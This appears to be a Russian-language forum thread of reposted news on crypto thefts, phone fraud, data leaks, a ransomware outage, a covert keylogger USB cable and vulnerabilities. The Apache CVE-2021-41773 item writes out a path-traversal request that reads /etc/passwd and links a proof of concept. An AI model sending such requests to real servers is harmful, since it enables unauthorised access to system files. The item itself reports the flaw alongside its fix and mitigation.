Однако хакеру удалось обойти службу 2FA и инициировать восстановление кошелька с помощью одного единственного хранителя данных без уведомления и разрешения пользователя криптокошелька. Атака увенчалась успехом — хакер выдал себя за владельца кошелька, получил одобрение на восстановление и вывел около $5 млн.
Команда Loopring обратилась за помощью к правоохранительными органам и компаниям, специализирующимся на расследовании криптопреступлений, чтобы заблокировать украденные активы и выследить злоумышленника.
Следователи Житомирского районного управления полиции собрали доказательства причастности 27-летнего житомирянина к по меньшей мере 30 уголовным правонарушениям.
В ходе досудебного расследования установлено, что мужчина размещал в различных сообществах в социальных сетях и мессенджерах объявления по поводу удаленной работы. Предложение хорошего заработка за сортировку цветных карандашей в домашних условиях привлекало немало искателей «легких» денег.
Получив отзыв заинтересованного клиента, мужчина продолжал общение по телефону, рассказывал обо всех преимуществах предложенной деятельности и опять же обещал немалую прибыль. Соискателям работы для получения партии карандашей необходимо было оплатить только доставку товара.
В зависимости от количества полученных канцелярских изделий сумма к уплате кол****ась от 400 до 1400 гривен. Однако после поступления средств на банковских счет, указанный работодателем, «клиенты» своего товара так и не получали. Также мужчина блокировал их в социальных сетях. Общая сумма убытков, причиненных потерпевшим, достигает около 20 тысяч гривен.
Личность и местонахождение причастного к обманщикам установили оперативники уголовного розыска Житомирского районного управления полиции.
Во время проведения следственных действий в доме мужчины правоохранители изъяли доказательства его противоправной деятельности: компьютерную технику с фиксацией переписок с соискателями заработка и банковскую карту сожительницы, которой без ее ведома пользовался для своих сделок.
Сейчас фигуранту инкриминируют совершение уголовных правонарушений, предусмотренных ч. 1 и ч. 2 ст. 190 (Мошенничество) УК Украины. Досудебное расследование в производстве продолжается.
За совершенные деяния подозреваемому грозит до трех лет заключения.
Мавроди одобряет
На протяжении двух лет 23-летний парень из нидерландского города Хенгело управлял криптобанком, одновременно принимая инвестиции от своей семьи, близких соратников и местных жителей. По имеющимся данным, минимальная комиссия за обслуживание составляла €5000, при этом 50% прибыли он забирал в качестве оплаты за свои услуги. Говорят, что местные даже окрестили его «криптогением».
Несколько дней назад он отправил примерно 300 инвесторам электронное письмо, в котором сообщил, что больше не может производить выплаты, поскольку он потерял все вложенные средства, включая, собственные деньги. Голландские юристы утверждают, что пострадавшие частные лица потеряли в результате скама от €35000 до €50 000 в криптовалюте, однако один из клиентов «криптобанка» заявил, что пропало приблизительно от €4,5 до €10 млн.
По словам адвокатов, представляющих интересы потерпевших, студент юридического факультета платил самым первым инвесторам деньгами, взятыми у новых клиентов, что представляет собой классическую схему пирамиды Понци.
Некий представитель голландского «криптогения» принёс извинения от его имени, заявив в электронном письме, что тот оказался в «совершенно психически неуравновешенном состоянии», в связи с чем обратился за медицинской помощью. Сообщается, что он удалил аккаунты в «Facebook» и «Instagram», отменил запланированную поездку в Турцию со своим футбольным клубом, а его дом пустует.
В России продемонстрировали новый квантовый компьютер, который, по утверждению ученых, является самым мощным в стране. Однако эксперты считают, что российская система пока не представляет угрозы для западных интересов в области криптографии.
Квантовый компьютер создан на базе Международного центра квантовой оптики и квантовых технологий при участии госкорпорации «Росатом». Система работает по принципу захваченных ионов и имеет мощность 16 кубитов. Для сравнения, IBM, Dwave и другие зарубежные компании производят квантовые компьютеры с сотнями кубитов.
На презентации был запущен алгоритм для расчета простой молекулы и показана его работа в реальном времени. «Наш квантовый компьютер, что важно, уже делает полезные вещи – моделирует молекулы, а не занимается научной абстракцией», – написал Илья Семериков, директор Международного центра квантовой оптики и квантовых технологий.
Квантовые компьютеры – это технология, которая, как надеются ученые, в будущем сможет ускорить многие вычислительно сложные задачи – включая поиск лекарств, материаловедение, оптимизацию транспортных потоков, логистику, прогнозирование погоды и, конечно, криптографию.
Однако пока что квантовые компьютеры находятся на ранней стадии развития и далеки от того, чтобы взломать современное шифрование. По оценкам исследователей из Fujitsu, для того, чтобы взломать RSA, нужен будет квантовый компьютер с не менее 10 000 кубитов и 2.23 триллиона квантовых вентилей. А даже тогда, как утверждают некоторые эксперты, тому, кто попытается это сделать, придется просеивать гору мусора, чтобы найти жемчужину.
Кроме того, сложно сломать RSA потому, что нет математического доказательства, что факторизация числа N (модуль RSA) является необходимым условием для расшифровки сообщения. Мы не знаем никакого эффективного метода для решения этой задачи без знания простых множителей N; и мы не знаем никакого эффективного метода для нахождения этих множителей из N. Поэтому знание N (публичный ключ) не позволяет расшифровать сообщение; это и есть суть публичного ключа – он может быть раскрыт, не давая возможности расшифровать сообщение.
В рамках выставки «Росатом» также представил свои разработки в области индустриального программного обеспечения (ПО), в том числе систему управления жизненным циклом (PLM) и платформу для объединения продуктов математического моделирования (САЕ). Эти продукты являются полностью импортозамещенными и способны конкурировать с мировыми лидерами по функциональности.
Ошибка сотрудника Google поставила под угрозу тысячи сотрудников спецслужб.
Утечка данных VirusTotal разрушает конфиденциальность разведчиков США и Германии
Ошибка сотрудника Google поставила под угрозу тысячи сотрудников спецслужб.
В конце июня в сети появился файл размером 313 Кб с данными 5600 клиентов платформы VirusTotal, среди которых были сотрудники АНБ США, немецких разведывательных служб и крупных немецких компаний. Об этом сообщили немецкие СМИ.
VirusTotal — это онлайн-сервис, предназначенный для анализа файлов и URL- адресов с целью определения наличия вредоносных программ. Сервис использует множество антивирусных движков и других инструментов для сканирования предоставленных объектов. Когда пользователь загружает файл или указывает URL- адрес на веб-сайте VirusTotal, сервис автоматически проверяет его на наличие вирусов, троянов, шпионских программ и других видов вредоносного кода. Таким образом, VirusTotal создаёт глобальный архив цифровых инструментов для атаки, своего рода библиотеку вредоносных кодов.
Однако этот сервис несёт в себе определённые риски. Один из них — это то, что загруженные на платформу файлы становятся доступными для всех, кто имеет специальный аккаунт. Это означает, что конфиденциальные данные могут попасть в руки злоумышленников, которые могут использовать файлы для шпионажа, фишинга или социальной инженерии.
В утечку попали сотрудники не только разведывательных служб, но и многих других организаций и компаний, которые занимаются информационной безопасностью. Среди них – полиция Германии, Федеральное ведомство по уголовным делам (BKA), Служба военной контрразведки (MAD) и Федеральная разведывательная служба (BND). Также в утечке присутствуют данные сотрудников крупных немецких корпораций Deutsche Bahn, Bundesbank, Allianz, BMW, Mercedes- Benz и Deutsche Telekom.
Утечка не затрагивает пароли или другие данные, кроме имён и электронных адресов. Однако этой информации может быть достаточно для проведения целенаправленных атак с использованием социальной инженерии или фишинга.
Утечка также ставит под сомнение надёжность и защищённость самой платформы VirusTotal, которая принадлежит Google. Редко, когда случается, чтобы внутренние данные Google-систем становились общедоступными из-за утечки.
После обнаружения утечки VirusTotal быстро удалил файл со своего сайта. Представитель Google Cloud сообщил, что утечка произошла из-за ошибки одного из сотрудников VirusTotal, который «случайно сделал доступной для всех небольшую часть» данных клиентов. Он также добавил, что компания работает над улучшением внутренних процессов и технического контроля, чтобы предотвратить подобные инциденты в будущем.
VirusTotal остаётся полезным и популярным сервисом для борьбы с кибератаками, но его пользователи должны быть осторожны и осознавать риски, связанные с загрузкой конфиденциальных данных на платформу. В противном случае пользователи могут стать жертвами тех, кому они пытаются противостоять.
Германии ](https://www.securitylab.ru/news/540083.php)
Ошибка сотрудника Google поставила под угрозу тысячи сотрудников спецслужб.
 www.securitylab.ru
кто нашел?
Киберспортсмен Кирилл Малофеев подал в суд из-за блокировки своего аккаунта после внесения его в санкционный список США.
Арбитражный суд Москвы арестовал средства и имущество компаний Amazon и принадлежащего ей сервиса Twitch. Как следует из определения , опубликованного на сайте суда, это обеспечительная мера по иску Кирилла Малофеева, сына владельца телеканала «Царьград» Константина Малофеева. Представитель стримера подтвердил изданию Forbes, что речь идет об аресте имущества на 3 млрд рублей.
В комментарии для издания Малофеев обвинил компании в произвольном нарушении контрактных обязательств и дискриминации русских киберспортсменов и их аудитории. По мнению стримера, судебное производство станет прецедентом для защиты интересов участников российской игровой индустрии и «вообще всех русских спортсменов».
«Нужно прекратить бояться таких структур как Twitch и всех тех, кто за ним стоит, и сообща бороться за соблюдение наших законных прав», — отметил Малофеев.
Напомним, что профиль Кирилла «Likkrit» Малофеева был заблокирован на Twitch после наложения на киберспортсмена санкций США.
Likkrit попал в санкционный список США в апреле этого года. Его отцом является российский миллиардер Константин Малофеев, владелец телеканала «Царьград».
source:
kad.arbitr.ru/Document/Pdf/12780c9d-1fd0-4728-b44e-e7ac541be3bf/16fb35d2-3e3c-4dec-a38f-f16a34ff7a83/A40-240440-2022_20221116_Opredelenie.pdf
forbes.ru/tekhnologii/481246-sud-arestoval-imusestvo-twitch-i-amazon-po-isku-
o-blokirovke-profila-malofeeva
Из-за кибератаки супермаркеты были вынуждены принимать только наличные платежи
или закрыться вовсе.
Порядка 330 супермаркетов SPAR на севере Англии испытывают серьезные операционные проблемы из-за кибератаки, произошедшей на прошлой неделе. В результате инцидента супермаркеты стали принимать только наличные, а некоторые и вовсе закрылись.
SPAR – международная франшиза супермаркетов, по которой работают 13 320
магазинов в 48 странах, однако недавний инцидент затронул только север Англии.
Согласно торговой компании Lawrence Hunt & Co, управляющей 25 магазинами в
графстве Ланкашир, «сбой в IT» затронул кассовые аппараты, системы обработки
платежей кредитными картами и электронную почту.
Как сообщил поставщик продуктов питания James Hall and Co, обслуживающий 600 магазинов SPAR в Ланкашире, его IT-системы также пострадали от кибератаки.
По состоянию на понедельник, 6 декабря, многие супермаркеты SPAR на севере
Англии оставались закрытыми.
Хотя инцидент имеет явные признаки атаки с использованием вымогательского ПО,
заблокировавшего критические IT-системы, характер кибератаки пока официально
не раскрывается.
Национальный центр кибербезопасности Великобритании опубликовал официальное заявление по данному вопросу. Согласно заявлению, ведомству известно об инциденте, и в настоящее время проводится его оценка.
Онлайн-мошенники начали взламывать аккаунты граждан на сайте госуслуг и через них брать кредиты и микрозаймы, пишет РБК со ссылкой на экспертов по информационной безопасности.
«Это уже серьезная проблема, а в ближайшем будущем она только усугубится. Много людей столкнется с попытками осуществления действий от их лица. Взлом учетной записи, подбор пароля или утечка данных могут привести к тому, что злоумышленник получит доступ к аккаунту на «Госуслугах» и, конечно, попытается монетизировать этот доступ», — заявил РБК руководитель аналитического центра Zecurion Владимир Ульянов.
Эти повышенные риски — обратная сторона удобства сервиса, который позволяет совершить множество операций. «Я надеюсь, что на портале появится возможность ограничить область использования аккаунта, чтобы человек сам мог выбирать уровень риска и набор доступных опций», — сказал Ульянов.
По словам эксперта, сейчас для повышения уровня защиты можно включить двухфакторную аутентификацию входа в личный кабинет, а также установить собственный сложный пароль. Однако это не поможет полностью уберечься от действий мошенников.
Заместитель заведующего кафедрой информационной безопасности МГТУ им. Баумана Анатолий Лебедев также предупредил о высоком риске мошеннических действий с кредитами и микрозаймами, которые берутся через профиль на «Госуслугах». Лебедев тоже отметил, что онлайн-сервисы сегодня хоть и удобны, но небезопасны. Обезопасить себя можно, только если не расслабляться и не надеяться, что государство тебя защитит.
Директор по развитию компании «Тридиви» (3DiVi Inc.) Дмитрий Морозов заявил, что ему не известно о фактах взлома профилей на «Госуслугах», но он допускает такую возможность. Эксперт надеется, что надежность аккаунтов сможет повысить биометрия, например вход по Face ID или скану сетчатки.
Сообщения о взломах личных кабинетов на «Госуслугах» стали появляться в социальных сетях в июле. Пользователи сообщали, что преступники меняли привязанный к сайту номер телефона, электронную почту и от имени пользователя отправляли заявки на получение кредитов и микрозаймов.
Злоумышленники брали до 3 тысяч долларов за свои услуги. Основными заказчиками взломов были граждане РФ и частные детективы из Украины.
Киберспециалисты Службы безопасности Украины остановили деятельность хакеров, которые взламывали личные страницы, мессенджеры, а также электронные почты пользователей. Об этом сообщает пресс-центр СБУ.
По данным СБУ, злоумышленники через виртуальный сервер (вероятней всего, на них создавали поддельные версии сайтов, где нужно было указать свои данные для входа) производили взлом аккаунтов ряда чиновников Киевской области. Установлено, что одним из числа пострадавших является глава одного из райсудов области.
За взлом аккаунта или аккаунтов злоумышленники брали до 3 тысяч долларов, в зависимости от сложности и объемов работы. Оплату за свои "услуги" хакеры получали в криптовалюте, а также через запрещенных в Украине российскими платежными системами.
Следствие считает, что возможный организатор схемы часто выезжал заграницу, в том числе в Россию. Якобы его основными клиентами были граждане России и украинские частные детективы. В спецслужбе изучают наличие возможной связи злоумышленника с российскими спецслужбами.
В результате обысков по месту жительства и арендованному офису были конфискованы для проведения экспертизы:
Следственные действия проводятся в рамках криминального дела по статье 359 (незаконное приобретение, сбыт и использование специальных технических средств получения информации) и части 2 статьи 361 (несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи) Уголовного кодекса Украины. Решается вопрос об вручении организаторам схемы подозрения.
СМИ сообщили, что Минцифры подготовило новые требования для борьбы с серыми
сим-картами. Согласно поправкам ведомства, иностранные граждане, в том числе
трудовые мигранты, или лица без гражданства смогут приобретать сим-карты
российских операторов связи только при наличии регистрации на портале
«Госуслуг» с использованием биометрии и при личном посещении салонов связи.
Требование не будет распространяться на дипломатов, представителей
международных организаций и беженцев. Также законопроект Минцифры требует от
сотовых операторов включать в договоры об оказании услуг связи с иностранцами
уникальный код устройства (IMEI; код мобильного гаджета, позволяющий его
идентифицировать). Также операторы не смогут подключить таким абонентам более
10 абонентских номеров. Договоры, заключённые с иностранными абонентами до
вступления закона в силу, операторы должны будут обновить до 1 марта 2025
года, а обслуживание неперерегистрированных номеров должно быть прекращено в
установленном порядке.
Представители Минэкономразвития и РКН подтвердили СМИ получение документа от
Минцифры. «Инициатива находится на рассмотрении. Предложения и комментарии
будут подготовлены и направлены в Минцифры в установленные сроки», – сообщил
СМИ представитель РКН.
Сейчас сотрудники офисов продаж мобильных операторов или дилеров при
заключении договоров на услуги связи могут испытывать трудности при
идентификации иностранцев по документам, удостоверяющим их личность, объяснил
СМИ представитель Минцифры. Например, бывает сложно установить, не является ли
документ подделкой, чтобы не оформить сим-карту на мошенника, продолжает он.
Отследить и привлечь их к ответственности в таком случае труднее.
В случае принятия законопроекта удостоверять личность иностранцев при
заключении договоров на услуги связи и активации их сим-карт будут по
биометрии из Единой биометрической системы (ЕБС), добавил представитель
ведомства. Это позволит однозначно идентифицировать личность иностранных
граждан и лиц без гражданства в офисах продаж и у дилеров, резюмировал он. Для
регистрации в ЕБС сейчас нужно сдать фото лица и запись голоса, сделать это
можно в отделении банка.
Председателя комитета по соцполитике ЯНАО и координатора регионального проекта "Здоровое питание" развели больше чем на 30 миллионов рублей. По классической схеме — с угрозой её сбережениям и переводом на "безопасные счета".
60-летнюю Надежду Гудкову обрабатывали целую неделю. Сперва ей позвонил неизвестный мужчина с подменного номера столичного УФСБ. Дальше — писали якобы сотрудники ФСБ и ЦБ в телеграме. Пели классические песни про попытки оформления кредитов и возможность лишиться всех своих денег.
Всего женщина перевела на "безопасные" счета, названные преступниками, почти 19 млн рублей личных сбережений и взяла кредит на 13,6 млн рублей, которые также ушли телефонистам. Как это часто и бывает, опомнилась жертва уже слишком поздно. Возбуждено уголовное дело о мошенничестве в особо крупном размере.
Три жительницы США предстанут перед судом Лос-Анджелеса по обвинению в незаконном получении от государства 980 тысяч долларов в виде студенческих ссуд. Как сообщает KTLA 5, основной обвиняемой по делу проходит 43-летняя Ньиша Рэмси (Nyisha Ramsey). В группу также входили ее 36-летняя сестра Дионн Рэмси (Dionne Ramsey) и 62-летняя свекровь Шэрин Барни (Sharyn Barney).
Следствие полагает, что с января 2012-го по август 2017 года подозреваемые смогли обманным путем поступить в общественный колледж округа Ориндж (штат Калифорния), использовав для этого чужие персональные данные — имена и номера социального страхования. При это как минимум часть этих сведений на самом деле принадлежали людям, находившимся в тюремном заключении и отбывавшим сроки по различным статьям.
Деньги от государства они получали по программе Free Application for Federal Student Aid (FAFSA), которая выдает студенческие ссуды необеспеченным американцам, поступающим в учебные заведения. По факту же Рэмси и ее сообщницы выводили эти средства на свои личные счета. Двое из них не признали себя виновными, третья пока не принимала участия в предварительных слушаниях. В случае обвинительного заключения по статье о заговоре с целью совершения мошенничества каждой из женщин грозит заключение сроком до 30 лет.
Издание ZDNet пишет, что в минувшие выходные спамеры засыпали Python Package Index (PyPI) и GitLab мусорным контентом, наводнив ресурсы рекламой сомнительных сайтов и сервисов. Причем эти атаки не были связаны друг с другом.
Репозиторию PyPI пришлось хуже, чем GitLab, ведь атака на него длится весь последний месяц. Спамеры активно злоупотребляют тем, что любой желающий может создавать на сайте записи для страниц несуществующих Python-библиотек. В итоге они служат SEO-рекламой для различных сомнительных сайтов.
Как правило, такие страницы содержат мешанину из ключевых слов на разные темы, начиная от игр и порно, и заканчивая из стриминговыми сервисами и фальшивыми раздачами подарков. При этом короткий URL часто ведет на мошеннические сайты, где у пользователя попытаются выведать данные платежной карты.
Представители PyPI сообщили журналистам, что им известно об этой волне спама, и администраторы уже работают над ее устранением. И хотя спам действительно начали удалять, атака все еще продолжается.
Похожая активность была замечена и на GitLab. В прошедшие выходные неизвестные заспамили Issues Tracker сайта аналогичным мусором, причем каждый из этих репортов провоцировал отправку электронного письма владельцам учетных записей.
[](https://xakep.ru/wp- content/uploads/2021/02/339135/gitlab-spam.png)
Судя по всему, администрация GitLab оказалась не готова к такой атаке. Система электронной почты ресурса в итоге была перегружена, ее работа замедлилась, а обычные письма задерживались и помещались в очередь.
__https://twitter.com/x/status/1358777539624198145
Издание отмечает, что такой вектор распространения спама (через репозитории) пока является новой тактикой для спам-групп, которые обычно сосредоточиваются на блогах, форумах и новостных порталах, где разделы с комментариями зачастую заполнены сомнительными ссылками.
Источник: xakep.ru/2021/02/09/pypi-gitlab-spam/
Специалист по безопасности Майкл Гровер (MG) в партнёрстве с компанией- производителем хакерских аксессуаров Hak5 начал продажу кабелей O.MG, которые он представил на конференции Defcon 2019. Раньше они изготовлялись маленьким тиражом и были доступны только для отдельных хакеров, а теперь купить устройство может любой желающий по цене от $119,99.
В кабель встроены веб-сервер и точка доступа WiFi. Версия Keylogger Edition предназначена специально для подключения клавиатур и сохраняет до 650 000 нажатий клавиш.
O.MG Cable создан для скрытого использования в полевых условиях, с функциями для удалённого запуска кода, скрытной работы, уклонения от обнаружения методами цифровой криминалистики, при этом он позволяет быстро менять инструментарий на лету.
Пока вы не загрузите в него полезную нагрузку, устройство работает как обычный USB-кабель.
Версия Keylogger Edition специально разработана для клавиатур с отсоединяемыми кабелями. Информацию о функциях прошивки, поддерживаемых клавиатурах и т.д. см. на странице разработчика.
Доступны восемь моделей с интерфейсом USB-A:
• Lightning — USB-A;
• USB-C — USB-A;
• USB micro — USB-A;
Lightning — USB-A, kelogger edition;
• USB-C — USB-A, kelogger edition;
• USB-C — USB-A (белая), kelogger edition;
• USB micro — USB-A, kelogger edition;
• USB micro — USB-A (2 метра), kelogger edition.
Первые три продаются по $120, остальные по $160.
Здесь перечислены только новые варианты кабеля с интерфейсом USB-A. Кроме них, выпускаются варианты типа Lightning — USB-C и USB-C — USB-C.
Все версии поддерживаю инъекцию произвольных нажатий клавиш с помощью DuckyScript. Прошивка оборудована инструментарием для изменения поведения на лету, в зависимости от места подключения. В определённых условиях кабель может инициировать скачивание полезной нагрузки, удалить её и т. д. Поддерживается изменение USB-дескрипторов, чтобы выдать O.MG за любое устройство любого производителя (VID, PID, iManufacturer, iSerialNumber, iProduct).
Дистанционное управление кабелем возможно в том числе через веб-интерфейс или напрямую через веб-сокет (для примера предлагаются полезные питоновские скрипты).
Кроме хакерских клавиатур, MG с коллегами также выпускают USB- блокировщики, которые физически отключают линии передачи данных при USB-подключении гаджета, чтобы исключить любую утечку информации во время USB-зарядки устройства от неизвестного источника питания, а также защитить свой компьютер от потенциально вредоносных USB-гаджетов, которые подключаются к нему якобы для зарядки.
• Video:
Полиция Гонконга арестовала группу преступников, которые обвиняются в продвижении мошеннической схемы инвестиций в криптовалюту на $1.4 млн.
Как сообщает Radio Hong Kong, во время двухдневной операции полицейские Гонконга арестовали 11 мужчин и 8 женщин. У мошенников было изъято 9 компьютеров, 128 смартфонов, спортивный автомобиль, а также криптовалюта на сумму $6 417 и $179 695 наличными.
Мошенники привлекали жертв в схему, суля им быстрый заработок и роскошный образ жизни в результате вложений в криптовалюту. По данным полиции, около 170 человек из разных стран, включая Китай и Великобританию, были обмануты в общей сложности на $1.4 млн.
Главный инспектор Лестер Ип Чеук-ю (Lester Ip Cheuk-yu) из гонконгского бюро полиции по кибербезопасности и технологическим преступлениям сказал, что из-за пандемии COVID-19 инвестиции в цифровую валюту стали особенно популярны в Гонконге в этом году, что привело к росту преступности в этой области.
«Люди стали больше сидеть дома. Это означает, что они проводят больше времени в Интернете. У мошенников есть больше возможностей связаться с ними, чтобы убедить расстаться с деньгами. Эта тенденция наблюдается не только в Гонконге, но и во всем мире», – сказал он.
Суперинтендант отдела по борьбе с технологическими преступлениями Там Вэйсинь (Tam Wai-shun) сказал:
«Мошенники все чаще используют интерес к цифровым валютам, ложные мобильные приложения и поддельные веб-страницы, чтобы обмануть доверчивых жертв».
По данным South China Morning Post (SCMP), за первое полугодие 2021 года в Гонконге было зарегистрировано 496 преступлений, связанных с криптоактивами. Мошеннические действия привели к потере $27.5 млн.
Сайт SitePoint, работающий с 1999 года, предоставляет доступ к множеству туториалов и книг по веб-разработке (платно), а также может похвастаться активным сообществом профессионалов и разработчиков. На прошлой неделе администрация сайта предупредила пользователей о компрометации.

Дело в том, что еще в декабре 2020 года небезызвестная хак-группа Shiny Hunters опубликовала в даркнете 26 баз данных, с информацией различных компаний. Среди них были и данные миллиона пользователей SitePoint. Расследовав этот инцидент, компания начала предупреждать пользователей о взломе.

«На данный момент мы полагаем, что доступная информация в основном касалась вашего имени, адреса электронной почты, хешированного пароля, имени пользователя и IP-адреса», — пишут представители SitePoint в электронных письмах, отправленным пострадавшим.
Click to expand...
Сайт уже инициировал сброс паролей (хотя украденные пароли были солеными и зашифрованы с использованием bcrypt) для всех учетных записей и теперь просит пользователей выбрать новые пароли длиной не менее десяти символов.
Источник: xakep.ru/2021/02/08/sitepoint-leak/
Согласно имеющимся данным, взлом произошел после того, как злоумышленники получили доступ к неназванному стороннему инструменту, который SitePoint использовал для мониторинга своей учетной записи GitHub.
«Это позволило им, через нашу кодовую базу, получить доступ к нашим системам. С тех пор этот инструмент был удален, все наши ключи API заменены, а пароли сброшены», — говорят в компании. Похоже, речь идет о компрометации компании Waydev, произошедшей летом прошло года.
Click to expand...
Судя по всему, предупреждать пользователей о компрометации компания начала вовремя, так как, по данным СМИ, пользователи SitePoint уже начали получать на «утекшие» email-адреса вымогательские письма и послания, обещающие раздачу криптовалюты (разумеется, фейковую). Причем многих из этих почтовых ящиков создавались исключительно для использования с SitePoint.
«Сотрудники Бюро специальных технических мероприятий МВД России при содействии коллег из Республики Татарстан пресекли деятельность передвижного узла связи. По имеющейся информации, с его помощью телефонные мошенники из-за рубежа совершали хищения денежных средств граждан Российской Федерации.
Предварительно установлено, что на территории Казани мобильная сим-ферма действовала в течение нескольких недель. Ее поиски полицейские вели в ходе оперативного сопровождения уголовного дела о дистанционном хищении с ущербом порядка 3 млн рублей. В полицию доставлен ранее судимый за мошенничество житель Новосибирска. Действуя по указанию анонимного куратора, он обеспечивал работу специального оборудования, которое позволяло подменять номера зарубежных абонентов на российские. Для противоправной деятельности использовались сим-бокс, GSM-шлюз и роутеры, которые были спрятаны в автомобильном сабвуфере. Фигурант приезжал в указанные куратором места, на некоторое время активировал установленное в машине оборудование, а затем выключал его и переезжал на другое место.
Следователем Следственного отдела ОП № 9 «Сафиуллина» УМВД России по г. Казани расследуется уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ.
Полицейские продолжают мероприятия, направленные на установление всех участников и эпизодов противоправной деятельности», - сообщила официальный представитель МВД России Ирина Волк.
• Video: https://rutube.ru/video/218997ac563197928cc65b13e15122c0/?r=plemwd
Интернет-мошенники похитили у двух жителей Гродно Br33 тыс. Об этом сообщили в отделении информации и общественных связей УВД Гродненского облисполкома.
От действий аферистов пострадали 58-летняя пенсионерка и 26-летний молодой человек. Они попались на новую и наиболее агрессивную форму мошеннических действий по выманиванию денег. "В обоих случаях неизвестный звонил на мобильник потерпевших с зарубежного номера. Женщине аферист представился сотрудником милиции, а молодому человеку - служащим подразделения безопасности банка. Гродненцам сообщили, что от их имени открыты кредиты на значительные суммы и чтобы их погасить, необходимы средства. Для их оперативного аккумулирования мошенники предложили взять кредиты и перевести деньги на принадлежащие потерпевшим банковские карточки", - рассказали в милиции.
Параллельно аферисты выведали информацию о реквизитах карточек пострадавших. Деньги, поступившие туда, были тут же выведены. Пенсионерка лишилась около Br10 тыс., молодой человек - Br23 тыс. Причем молодому человеку злоумышленник звонил дважды: в первом случае он сумел отказать преступнику, а во втором почему-то нет.
Поняв, что пострадали от рук мошенников, потерпевшие обратились в милицию. Возбуждены уголовные дела.
Серия целенаправленных шпионских атак в Северной Африке была связана с ранее нераскрытым модульным бэкдором под названием «Стелс-солдат». Новая кампания, нацеленная в первую очередь на отдельных лиц в Ливии, фокусируется на операциях по наблюдению, согласно новым рекомендациям, опубликованным сегодня Check Point Research (CPR). В частности, бэкдор Stealth Soldier включает в себя кражу файлов, запись экрана и микрофона, регистрацию нажатий клавиш и кражу информации браузера. Команда CPR подчеркнула один важный вывод: инфраструктура, связанная с Stealth Soldier, демонстрирует сходство с инфраструктурой, используемой в предыдущей кампании, известной как «Глаз на Нил». Последние атаки были нацелены на египетское гражданское общество в 2019 году, но сходство с Stealth Soldier предполагает возможное повторное появление того же злоумышленника после долгого перерыва
Microsoft has fixed a Windows 10 bug that could cause NTFS volumes to become corrupted by merely accessing a particular path or viewing a specially crafted file.
Last month, BleepingComputer reported on a new Windows bug that allows any
users, including those with low privileges, to mark an NTFS volume as dirty.
All a Windows user had to do to trigger the bug was to try to access a special
path, shown in the image below.
Microsoft has fixed a Windows 10 bug that could cause NTFS volumes to become
corrupted by merely accessing a particular path or viewing a specially crafted
file.
Last month, BleepingComputer reported on a new Windows bug that allows any users, including those with low privileges, to mark an NTFS volume as dirty. All a Windows user had to do to trigger the bug was to try to access a special path, shown in the image below.

Accessing path marks drive as corrupted
Once Windows tried to access the path, it would state that the "The file of
directory is corrupted and unreadable." and then marks the drive letter as
corrupted and in need of repair.
Windows then prompts the user to reboot the computer and run chkdsk to fix the
corruption.
Microsoft [has said](http://www.osr.com/blog/2021/01/21/mitigating- the-i30bitmap-ntfs-bug/) that the drive is not actually corrupted and Windows chkdsk will fix the problem. Unfortunately, in one of our tests and others, chkdsk did not fix the issue, and Windows 10 refused to boot again.
After the bug was disclosed, there was a hope that Microsoft would push out a fix as part of the February Patch Tuesday.
When that did not happen, Mozilla Firefox 85.0.1 added a check to prevent the path from being accessed, and OSR released an unofficial patch that blocked the path in Windows.
With this week's release of Windows 10 Insider build 21322, Microsoft has included an undocumented fix that prevents the path from being accessed.
Now when you attempt to access the  path, Windows 10 will report "The directory name is invalid," as shown below, and no longer marks the NTFS volume as corrupted.
NTFS corruption bug fixed
in Windows 10 'Dev' channel
Unfortunately, this fix has only landed in the Windows 10 Insider 'Dev'
channel and not the Windows 10 21H1 'Beta' preview, the next feature update to
be released this spring.
Unless Microsoft uplifts this fix to a Windows version being released sooner, we will likely be stuck with this bug for some time.
В экстренном порядке сформировано обновление http-сервера Apache 2.4.50, в котором устранена уже активно эксплуатируемая 0-day уязвимость ([CVE-2021-41773](https://security- tracker.debian.org/tracker/CVE-2021-41773)), позволяющая получить доступ к файлам из областей вне корневого каталога сайта. При помощи уязвимости можно загрузить произвольные системные файлы и исходные тексты web-скриптов, доступные для чтения пользователю, под которым запущен http-сервер. Разработчики были уведомлены о проблеме ещё 17 сентября, но смогли выпустить обновление только сегодня, после того как в сети были зафиксированы случаи применения уязвимости для атаки на сайты.
Опасность уязвимости сглаживает то, что проблема проявляется только в недавно выпущенной версии 2.4.49 и не затрагивает все более ранние выпуски. В стабильных ветках консервативных серверных дистрибутивов выпуск 2.4.49 ещё не использовался (Debian, RHEL, Ubuntu, SUSE), но проблема затронула непрерывно обновляемые дистрибутивы, такие как Fedora, Arch Linux и Gentoo, а также порты FreeBSD.
Уязвимость вызвана ошибкой, внесённой в ходе переработки кода для нормализации путей в URI, из-за которой закодированный при помощи последовательности "%2e" символ точки в пути не нормализировался, если ему предшествовала другая точка. Таким образом, оказалась возможной подстановка неочищенных символов "../" в результирующий путь через указание в запросе последовательности ".%2e/". Например, запрос вида "[https://example.com/cgi- bin/../../../../etc/passwd](https://example.com/cgi- bin/.%2e/.%2e/.%2e/.%2e/etc/passwd)" или "[https://example.com/cgi- bin/../../../../etc/hosts](https://example.com/cgi- bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts)" [позволял](https://github.com/iilegacyyii/PoC- CVE-2021-41773/blob/main/CVE-2021-41773.py) получить содержимое файла "/etc/passwd".
Проблема не проявляется, если доступ к каталогам явно запрещён при помощи настройки "require all denied". Например для частичной защиты можно указать в файле конфигурации:
Code:Copy to clipboard
<Directory />
require all denied
</Directory>
В версии Apache httpd 2.4.50 также устранена ещё одна уязвимость (CVE-2021-41524), затрагивающая модуль с реализацией протокола HTTP/2. Уязвимость позволяла через отправку специально оформленного запроса инициировать разыменование нулевого указателя и вызвать крах процесса. Данная уявзимость также проявляется только в версии 2.4.49. В качестве обходного пути защиты можно отключить поддержку протокола HTTP/2.
Сомнения распространяются по поводу того, что в аэропорту на западе США сразу после запуска Северной Кореей гиперзвуковой ракеты был отдан приказ о «земной остановке».
Федеральное управление гражданской авиации США(FAA) сообщило через социальную сеть(SNS) : «В качестве меры предосторожности некоторые аэропорты на западном побережье в ночь 10-ого января приостановили взлеты на 15 минут. Мы регулярно принимает меры предосторожности и пересматриваем процесс, связанный с этим действием по остановке наземного обслуживания». Это была временная "превентивная мера" без объяснения причин запрета на взлет.
